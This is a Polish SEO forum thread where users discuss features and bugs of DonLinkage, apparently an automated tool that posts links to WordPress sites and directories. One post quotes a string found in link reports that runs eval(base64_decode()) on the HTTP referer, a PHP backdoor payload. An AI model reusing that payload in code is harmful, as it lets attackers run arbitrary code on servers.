Jump to content
okazwłoka

DonLinkage - najnowszy automat do pozycjonowania

Recommended Posts

Jak obecnie wygląda sytuacja z dodawaniem do WP?

Najtańsze domeny w Polsce - 13685790121473354021 -3% kod na dowolny serwer wirtualny.

W najbliższym czasie dojdzie osługa generatora synonimów http://www.forum.optymalizacja.com/topic/199332-generator-synonimow-online-synonimi4apl/ - będzie sprzężone przez api - przy każdym polu będzie można generować synonimy jednym kliknięciem.

Będzie też aktualizacja DonLinkage z tym podglądem i kilka popraweczek.

e4981491d26bc1c61d09811a4c4bc061.png

W najbliższym czasie dojdzie osługa generatora synonimów

w ramach premium czy regular price? :)

Gdzie w nowej wersji są informacje o tym ile dany katalog ma błędów, przeszukałem i nie widze

Szybki i sprawdzony serwer do GSA, CS czy ZennoPostera - SolidSeoVPS

DLA obecnie dodaje 2x wpis do WP. ( przy 1 projekcie)

Generator tekstów ArtMasta nie działa w obecnym DLA.

Moja sugestia:

- przy tworzeniu projektu w artykułach dodać button generuj treści + dodaj synonimy

Edited by cinmar

Sprawdzam to, będzie przy aktualizacji mam nadzieję poprawione.

@cinmar - wyjaśnij jak chciałbys zeby te przyciski działały :)

e4981491d26bc1c61d09811a4c4bc061.png

Hmm tutaj myslalem wykorzystsać moduł który masz "Automatyczne generowanie tekstów z synonimami!", porpostu klikasz generuj tekst i generuje prosto do projektu bez kopiowania itd, z tym że ustawione sa jakieś limity, może by wykorzystal do tego ArtMasta?. W 1 sofcie byla taka opcja i bardzo dobrze to sie sprawdzało z tym że określane były limity na poszczególne typy formularzy w zależności do czego szedl tekst np do katalogow generował np max 250 znakow, tutaj można by otworzyć okno pomocnicze w określeniu ilości znaków, pomysl do przemyślenia.

@ okazwłoka

1. Jeżeli ustawimy np. dodawanie harmonogramu do wordpressów, będziemy dodawać i później usuniemy to zadanie, to czy przy kolejnym ustawieniu dodawania zacznie dodawać od początku czy tam gdzie skończył ostatnio?

2. Czy jeżeli w polu: Ilość ustawię 0 to zadziała to tak jak w MAX, czyli bez ograniczeń?

3. Przy dodawaniu do wordpressów w niektórych linkach w raporcie na końcu mam doklejone:

/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Da radę nie doklejać tego kodu?

4. W czasie dodawania w harmonogramie mam podaną wartość W TRAKCIE id: x. Czy mógłbyś wprowadzić również statystykę ile dodało i ile jest wszystkich do dodania czyli np. jak mam 100 katalogów a dodaje aktualnie do 50 to by było 50/100 - wtedy będzie widać jaki jest progres. Podawanie ID nic nie wnosi bo zwykle są to wartości dużo wyższe niż ilość katalogów.

5. Przydałoby się aby w sofcie była jakąś zakładka FAQ i tam wyjaśnienie podstawowych pytań odnośnie softu, np. jakie crony trzeba ustawić, do czego służą i inne podstawowe pytania, które często się pojawiają.

Edited by Bestek

Guest
This topic is now closed to further replies.

• Recently Browsing   0 members

No registered users viewing this page.

• Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. Terms of Use Privacy Policy